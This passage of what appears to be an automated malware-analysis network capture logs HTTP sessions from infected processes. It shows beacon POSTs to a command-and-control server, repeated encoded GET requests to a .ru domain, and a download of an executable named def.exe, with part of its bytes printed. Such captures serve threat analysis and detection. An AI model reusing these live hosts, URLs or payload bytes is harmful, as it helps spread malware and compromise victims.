Nov 15, 2024 14:11:27.333307981 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50141	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:27.358011961 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:28.291275024 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50142	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:27.458420038 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:29.412678003 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	50143	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:29.536472082 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:30.451117039 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50144	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:29.812757015 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:30.715924978 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50146	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:30.579464912 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:31.491408110 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50148	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:31.614044905 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:32.531662941 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50150	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:32.331772089 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:33.253588915 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50151	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:32.661973000 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:33.840322018 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:33.841260910 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50153	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:33.963259935 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:34.881356001 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50155	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:34.769644976 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:35.693778038 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50156	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:35.033852100 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:35.935717106 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50157	185.215.113.16	80	6324	C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:35.629012108 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 15, 2024 14:11:36.939043999 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:36 GMT Content-Type: application/octet-stream Content-Length: 2790400 Last-Modified: Fri, 15 Nov 2024 12:57:58 GMT Connection: keep-alive ETag: "67374556-2a9400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 14 b3 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+`Ui` @ @.rsrc`2@.idata 8@fnateuls@4:@eutlwerm n@.taggant@+"r@
Nov 15, 2024 14:11:36.939111948 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:11:36.939150095 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:11:36.939182997 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:11:36.939217091 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:11:36.939250946 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:11:36.939286947 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 15, 2024 14:11:36.939424992 CET	1236	IN	Data Raw: 72 c1 4e 61 4a e6 51 1a d3 f5 4f a2 c2 3f f3 4f 6f 2a dd 3f 30 0c ec ff fd af 0d 23 99 2c 7e 2c 2b 3d a4 bb 93 4e bd 7f 7b 76 13 4a a4 08 62 1f e0 b0 31 50 1c bb 4a 04 d1 0e 55 06 e1 b8 86 2d e4 c3 41 60 4a ba 45 68 2e 9f 2e 0a bf a5 54 b1 0b 5e Data Ascii: rNaJQO?Oo?0#,~,+=N{vJb1PJU-A`JEh..T^E=dF: ?[.Od&LA3<@1Rl#8~)KFR$%8@\ .)s7-K'2c,G^2?ZA{8hD7n]{>KQ{/8O.a9
Nov 15, 2024 14:11:36.939457893 CET	1236	IN	Data Raw: 5e c2 27 6a 86 c2 33 3e 6f 55 b0 49 c9 9d 2d d3 0f 95 41 46 42 0c 0c 43 00 3a 14 5a e6 fd 43 61 10 95 03 40 72 dd ff 5e 77 cc c5 e1 e5 c2 e7 5f 10 e1 27 92 42 f9 d7 4b 34 26 e2 85 0e 9d cb 2a 40 9e a3 a5 c8 41 3b d8 e5 3d 1c 61 50 ae c3 b1 57 85 Data Ascii: ^'j3>oUI-AFBC:ZCa@r^w_'BK4&@A;=aPW}`p(GNlz:O?k]ilG#Kt"A\Rc/J* GN)#3#O9Q afo~Z'A.=WcUz0MDC!JAP!RB
Nov 15, 2024 14:11:36.939508915 CET	1236	IN	Data Raw: 26 a3 3e 5b 3c 05 28 2f 23 da 77 5f db 59 3d cd d4 cc 29 92 16 b2 13 fb c9 e7 fc 82 35 65 e3 fb 2b 9a fd 90 d4 46 0a 1d 61 e8 62 2e f0 ab 02 eb 1f bd e3 6f c6 dc b6 7d e0 cd cd 7d 31 ec d7 a6 57 b2 db 52 e2 e8 f3 58 d7 73 a4 60 4e 12 1f ae 92 57 Data Ascii: &>[<(/#w_Y=)5e+Fab.o}}1WRXs`NWC0p\}o=Rf"zLoo/x5Lvc_(:)0fLXM`ybz)0Nx594CA%vb1qB)[vQ:<#0-;_5.t1VzufW2+
Nov 15, 2024 14:11:36.944256067 CET	1120	IN	Data Raw: cd fa 6e f5 f7 a9 4c 26 f4 25 53 1d ad c9 09 41 c4 b2 3d a1 c3 a9 e7 31 c1 93 5b 79 c7 ba 70 50 c4 b9 f5 53 11 ae 99 ee 42 66 61 8a 25 7c 2b d3 0e 7f e0 5c 27 db 2f 22 10 cb 39 6d 2e ee db 53 be e0 f1 5e 34 ec e6 12 90 a2 50 f1 7f d8 dc 9e 2f 65 Data Ascii: nL&%SA=1[ypPSBfa%\|+\'/"9m.S^4P/e/6SI>B=:D"dY#Pk'LL7Jk/$$PRz"Q{\+nHSMPI(}[j/w;DR#7)X/]+gd5k&n#c(}V2@t$P:q/)l%dn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50158	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:36.050276041 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:37.387039900 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50159	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:37.333542109 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:38.238007069 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50160	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:37.516792059 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:38.436263084 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50162	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:38.562267065 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:39.486295938 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50163	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:39.623197079 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:40.524957895 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50164	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:39.760983944 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:40.672715902 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50165	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:40.643814087 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
